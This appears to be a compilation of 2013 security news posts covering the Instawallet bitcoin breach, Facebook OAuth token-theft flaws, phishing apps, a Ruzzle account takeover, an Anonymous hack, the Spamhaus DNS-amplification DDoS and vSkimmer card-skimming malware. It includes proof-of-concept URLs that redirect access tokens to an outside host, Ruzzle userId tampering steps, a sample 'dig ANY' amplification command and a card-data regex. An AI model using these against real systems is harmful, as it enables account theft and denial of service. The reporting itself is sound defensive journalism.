The digital currency Bitcoin has suffered yet another hack. Bitcoin wallet site Instawallet has been taken offline after a security compromise, has suspended its service indefinitely.

Instawallet didn't say in a notice on its website how many bitcoins were stolen after hackers fraudulently accessed company database. "The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is."

Bitcoin is a virtual currency that uses a peer-to-peer system to confirm transactions through public key cryptography. The company also announced it will accept claims for individual Instawallets for the first 90 days, using the wallets’ URL and key to file the claim. Clients will then be refunded the currency value if the balance is less than 50 BTC.

The breach follows a series of attacks targeting bitcoin services. In September 2012, Bitfloor has suspended all operations after a hacker stole $250,000 worth of bitcoins. In May of last year, exchange site Bitcoinica was also breached, and attackers managed to grab bitcoins valued at $90,000.

It may be a day or two before the effect of this theft on the currency can be determined. Bitcoin-Central is expecting to have their services back up and running within 48 hours and have promised to give 24 hours notice before going live. Instawallet however has been permanently compromised and is closing.

In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth.

This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts. 

 For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program.

Nir also demonstrated that an attacker is even able to gain knowledge of which application their victims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m

Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks.

Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users.

POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords.

Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps.

Spammy Facebook apps are nothing new, the web giant has been dealing with suspicious behavior apps since the website launched the Facebook Platform for developers in 2007. As an open source app development tool, anyone can create an app, including people who really just want to steal your information, and your money.

 With cyber crime  including identity theft, on the rise, more Facebook users should begin to pay closer attention to what they click on, especially if it is shared in a spammy way. Sophos reports that nearly 60,000 people have clicked on one scam in particular, which is one that promises to allow you to see who has viewed your profile. The app automatically posts a comment to the users timeline, and sometimes posts as a photo with the message ‘OMG OMG OMG… I cant believe this actually works! Now you really can see who viewed your profile ! on (link here). ‘

The app does not actually allow users to see profile views but instead leads them, and anyone who clicks on the link posted to their wall, to a phishing scam designed to steal personal information. And despite the red flags, Sophos, who tracked a single link through bit.ly, found that more than 58,000 people clicked on the link before it was shut down. 

Real Life Example

Another all too common Facebook phishing app is the ‘Facebook Colors’ app which can appear as ‘Facebook Green’, ‘Facebook Red’, or in the case of this demonstration ‘Facebook Black.’ The following app was installed on a computer with a fully working antivirus including a link scanner.

First, Facebook Black demonstrates a couple of spammy properties right off the bat. Typically when real people post, they do not post a photo and a comment, which is the first sign. Second, most will say something other than ‘check it out’. Last but not least, if you see more than one person posting the same comment with a link, you definitely have a spam app on your hands. For anyone looking forward to installing a black Facebook let’s look at where this particular app goes.

What this shows you is that despite being advertised as a Facebook application, it’s actually a web browser app. You will have to allow it on your Facebook first, but will then be asked to allow it in your browser. Should you install it to test it out yourself, you can uninstall it via your browser applications. After clicking ‘add’ you would expect to be taken to a ‘black’ Facebook. Instead, you get this page.

You can click on any of the three ‘ you've won’ options, although I tested all three and while two led to phishing websites, one was actually broken, which is more than a little hilarious. The broken link actually goes to this page.

Which is absolutely nowhere, and just about the safest you will get with this particular app installed on your browser. One of the other links was slightly less benign, and was actually picked up by the linkscanner on the browser.

Many Facebook scam and phishing apps promise users things that seem hard to resist. Options such as profile personalization, viewing people who spend time on your profile, and even some games can instead steal your information or spam your friends with malware and viruses, and post items on your wall without your permission. Most of these apps are designed to make money for the maker in some way or another, and usually that money is made off of you. 

Warning Signs

Most apps on Facebook are perfectly benign and can be used without a problem. There are however a couple of basic signs you can look out for to help with recognizing scam and phishing apps.

• Automatic tagging and sharing links
• Automatic Commenting and sharing links
• Automatic Invitations
• Promised Features That You Haven't Already Seen in Use
• The App Vanishes With No Results After Being Installed

Removing a Spam or Phishing App from Your Facebook

If the app you have installed includes any of the following signs, you might want to remove it as quickly as possible. The current version of Facebook allows you to completely control which apps have access to your profile by clicking the small gear in the upper lefthand corner. From there, you can click ‘settings’ and then ‘apps’ from the app page. You can remove anything in the apps that you are not familiar with or did not install. 

If the app has in fact installed to your browser, you can likely uninstall it by going into tools and then extensions or add-ons depending on which browser you are using. 

Studies show that identity theft is once again rising to become the most popular scam. Phishing emails and apps are the easiest way to steal identity including name, phone number, credit card information, and even home address. An estimated 12.6 Americans were the victims of Identity theft in 2012, a number that is nearly as high as the 2009 record of 13.9. The only way to protect yourself is by exercising caution and thinking before you click.

Guest Post by Brandy Cross, freelance writer and tech blogger for The High Tech Society. She loves hot cups of tea, zombies, games, and learning new things.

We are in digital era, everything is connected to the large networks and applications benefit of even more complex devices that deeply interact with owner, in this scenario security requirements assume a crucial importance and security of overall architecture also depend on security of single components.

In these months mobile users have gone crazy for a simple video game named Ruzzle, developed by the Swedish gaming company MAG Interactive, available for iOS and Android devices.

The game mechanism is inspired by the board games Boggle and Scrabble. Early 2013 the researcher at Hacktive Security started a study on most spread mobile applications such as popular Ruzzle focusing on the protocol implemented and possible repercussion on user’s privacy.

Ruzzle protocol use Json for response within a user’s session, security analyst discovered that is it possible to tamper them due the absence of control on server side on data sent by the application.

 The leak of data validation is widely exploited in web application context typically to increase attacker’s privileges or worst to impersonate the victim within an authenticated session. 

The research conducted demonstrated that it is possible to obtain access with a profile different from the one of the victim without authentication and of course to perform any actions exactly as the attacked user.

One of the most interesting components of the Ruzzle game is the chat, yes today the key feature of any game is it’s social aspect, it’s capability to make in direct contact users to simply play a game or exchange messages. 

Ruzzle doesn’t escape to this simple rule, experts at Hacktive Security demonstrated that a ill-intentioned user can obtain full control of the victim's account with serious repercussion.

The attackers can access to the whole list of played games including current games and it could also challenge other victim's friends … but most concerning thing is that the attacker could access to victim’s private messages exchanged with other users via internal chat feature and it could impersonate the victim in other chat conversations.

Following the evidences provided by the team of analysts in their blog post, Opening Ruzzle on a mobile device, the app perform the login process through a request using a classic HTTP POST method:

the POST above is the request originated by the client, containing the right parameters submitted through the application (in our case the login process is performed through the integration with the Facebook authentication). 

A showed in the above statement all information related to users identity are included in the json structure sent as response, this data could be easy intercepted and manipulated, for example simply modifying the value of parameter userId used to identify the victim.

“To obtain the value of a userId is enough to intercept the regular traffic generated by Ruzzle while challenging the chosen victim. We proceeded in tampering the value of the userId parameter with the one assigned to our victim:”

Once done this, the last step is to tamper few other parameters inside of the refreshCache POST. The parameters that need to be tampered are the following cacheKey values:

• listRequests_NNNNNNNNN
• listInvites_NNNNNNNNN
• listActiveGames_NNNNNNNNN
• list_FinishedGames_NNNNNNNNN

The NNNNNNNNN represent the userId that in the POST originated by Ruzzle contains the legitimate value of the userId cached by the app. Submitting these cacheKey values tampered with the victim's userId in the numeric part after the underscore is the final step. The json response to this POST indeed loads into the Ruzzle app all data about the victim's account as briefly reported under.

At this point the attack is completed, Ruzzle client on the mobile device has access to victim's account including all information described above.

What is the lesson that Hacktive Security team has given us?

Different are the element of discussion starting from the study of Italian team, first consideration is related to level of exposure of user due the his ordinary access to internet, also a simple application could be exploited by attackers that could violate our privacy. Be aware of which applications to use, and in which context, today high debated is argument of BYOD, the improper use of applications in workspace could expose sensitive information of company with serious consequences.

Second consideration is related to the design of mobile application and the necessity to consider user’s security at first place, even if we are developing a video game. Mobile devices are powerful platforms and attackers could exploit them for various purposes, video game are principal vector of infection and could be used in a simple way to gather access to user’s devices.

The app world is increasing in impressive way pushed by the explosion of mobile market, but we cannot forget that apps run also in other context, such as of appliances, due this reason I believe that software produced have to recognize and share a set of minimum requirements related to security … I hope that in the future is will be not so simple access to data managed by an application like Ruzzle.

Hacking group Anonymous claims to have broken into North Korean site Uriminzokkiri.com and got their hands on more than 15,000 user credentials. A message posted online makes the claim and includes details for six accounts, apparently showing user names, e-mail addresses, birth dates, and hashed passwords.

"Enjoy these few records as a proof of our access to your systems (random innocent citizens, collateral damage, because they were stupid enough to choose idiot passwords), we got all over 15k membership records of www.uriminzokkiri.com and many more. First we gonna wipe your data, then we gonna wipe your badass dictatorship "government"."

Of the six users, three have Korean names and the other three appear to be Chinese. "North Korean government is increasingly becoming a threat to peace and freedom. We demand: - N.K. government to stop making nukes and nuke-threats, uncensored internet access for all the citizens and Kim Jong-un to resign"

Four of the six users have Chinese email addresses, there’s a Hotmail address and one South Korean address that apparently belongs to KEPCO KDN, a smart-gird systems provider that’s part of the Korea Electric Power Co.

"Don't fear us, we are not terrorist, we are the good guys from the internet. AnonKorea and all the other Anons are here to set you free. We are Anonymous We are Legion We do not forgive We do not forget Expect us!" message read.

The last week has seen probably the largest distributed denial-of-service (DDoS) attack ever. A massive 300Gbps was thrown against Internet blacklist maintainer Spamhaus' website but the anti-spam organisation , CloudFlare was able to recover from the attack and get its core services back up and running. 

Spamhaus, a group based in both London and Geneva, is a non-profit organisation that aims to help email providers filter out spam and other unwanted content. Spamhaus is pretty resilient, as its own network is distributed across many countries, but the attack was still enough to knock its site offline on March 18.

Five national cyber-police-forces are investigating the attacks.  A group calling itself STOPhaus, an alliance of hactivists and cyber criminals is believed to responsible for bombarding Spamhaus with up to 300Gbps.

The attacks on Spamhaus illustrate a larger problem with the vulnerability of systems fundamental to the architecture of the Internet, the Domain Name Servers (DNS). The high attack bandwidth is made possible because attackers are using misconfigured domain-name service (DNS) servers known as open recursive resolvers or open recursors to amplify a much smaller attack into a larger data flood.

Known as DNS reflection, the technique uses requests for a relatively large zone file that appear to be sent from the intended victim's network. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers

"In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."

It now seems that the attack is being orchestrated by a Dutch hosting company called CyberBunker. As long as it's not child porn and anything related to terrorism, CyberBunker will host it, including sending spam.  Spamhaus blacklisted CyberBunker earlier in the month.

However, the DDoS attacks have raised concerns that further escalations of the retaliatory attacks could affect banking and email systems. DDoS attacks are typically carried out to extort money from targeted organisations or as a weapon to disrupt organisations or companies in pursuit of ideological, political or personal interests.

A new botnet emerged from underground and is menacing payment world, the cyber threat dubbed vSkimmer come from Russia according revelation of McAfee security firm. 

The security expert Chintan Shah wrote on a blog post that during monitoring of Russian underground forum found a discussion about a Trojan for sale that can steal credit card information from Windows PC for financial transactions and credit card payments. 

vSkimmer agent is able to detect card readers on the victim’s machine and gather all the information from the Windows machines sending it to a remote control server encrypting it (Base64).

The malware collects the following information from the infected machine and sends it to the control server:

Machine GUID from the Registry

Locale info

Username

Hostname

OS version

The vSkimmer malware indicated as the successor of the popular Dexter, a financial malware that targeted Point-of-Sale systems to grab card data as it transmitted during sales flow.

Dexter is responsible for the loss of nearly 80,000 credit card records and data breach of payment card data of Subway restaurants in 2012.

According security researchers at McAfee vSkimemr appeared in the underground forum since February and it could be an ongoing project.

To be precise on Track 2 was stored card number, three-digit CVV code, and expiration date are stored, all necessary to qualify card in payment processes.

On credit card information grabbing the post states:

“VSkimmer maintains the whitelisted process, which it skips while enumerating the running processes on the infected machine.Once vSkimmer finds any running process not in the whitelist, it runs OpenProcess and ReadProcessMemory to read the memory pages of the process and invokes the pattern-matching algorithm to match the regular expression “?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??”)” and extract the card info read by the payment devices. This is done recursively for every process running in the infected machine and not on the whitelist.”

VSkimmer demonstrated the great interest of cyber crime in payments sector institutions have already been attacked in the past by malicious code such as Zeus and SpyEye and this case is just “another example of how financial fraud is actively evolving and how financial Trojans were developed and passed around in the underground community.” This botnet is particularly interesting because it directly targets card-payment terminals running Windows,” Shah explained in his post, I found really interesting the fact that the offer of similar malware in the underground is increasing and their model of sale is reaching level of excellence never seen first ... we face difficult times.